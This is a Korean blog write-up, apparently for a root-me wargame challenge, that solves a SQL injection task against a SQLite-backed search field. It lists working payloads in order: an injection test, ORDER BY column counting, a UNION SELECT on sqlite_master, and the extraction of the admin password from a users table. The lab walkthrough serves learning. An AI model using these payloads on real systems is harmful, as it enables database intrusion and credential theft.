사실 여기서 어떤 부분을 봐야 할지 막막했다. 근데 저기 Home에 있는 것들은 훼이크였고, 저기 오른쪽 조그맣게 Search로 들어가는 부분에서 아래 사진과 같은 입력 값을 넣을 수 있었다.
제일 먼저, 1'or 1=1-- 를 입력하여 인젝션이 가능한지 확인했다. 에러가 뜨는걸 보니 가능한가 보다. 하지만 여기서 또 갈 길을 잃어 payload를 보게 되었는데, 내가 SQLite3라는 중요한 정보를 놓치고 있던 것이었다. SQLite는 MySQL보다 더 가벼운 DBMS 문법이었다.
따라서 이제 우리는 SQLite를 사용해야 한다는 것을 알았으니, 쉽게 따라올 수 있을 것이다.
1'order by 1--
1'order by 2--
1'order by 3-- 여기서 에러가 났다.
그럼 테이블의 개수는 2개, SQLite 테이블명 조회를 검색했다. SELECT name FROM sqlite_master; 를 사용하면 된다.
1'union select 1, sql FROM sqlite_master;-- 를 입력했다. // sql을 검색한게 변수를 불러와서 아래와 같이 칼럼도 나온 건가?
news 테이블과 users 테이블이 나온다.
1'union select 1, username FROM users;--
느낌상 admin의 password를 알아야 할 것 같으므로
1'union select 1, password FROM users where username='admin';--
아래와 같이 플래그를 얻을 수 있었다.
'워게임 > root_me' 카테고리의 다른 글
[root_me] Filters (0) | 2020.09.01 |
---|---|
[root me] File upload - Double extensions (0) | 2020.08.26 |
[root me] HTTP-Open Redirect (0) | 2020.08.06 |
[root_me] PHP-Command Injection (0) | 2020.08.01 |
댓글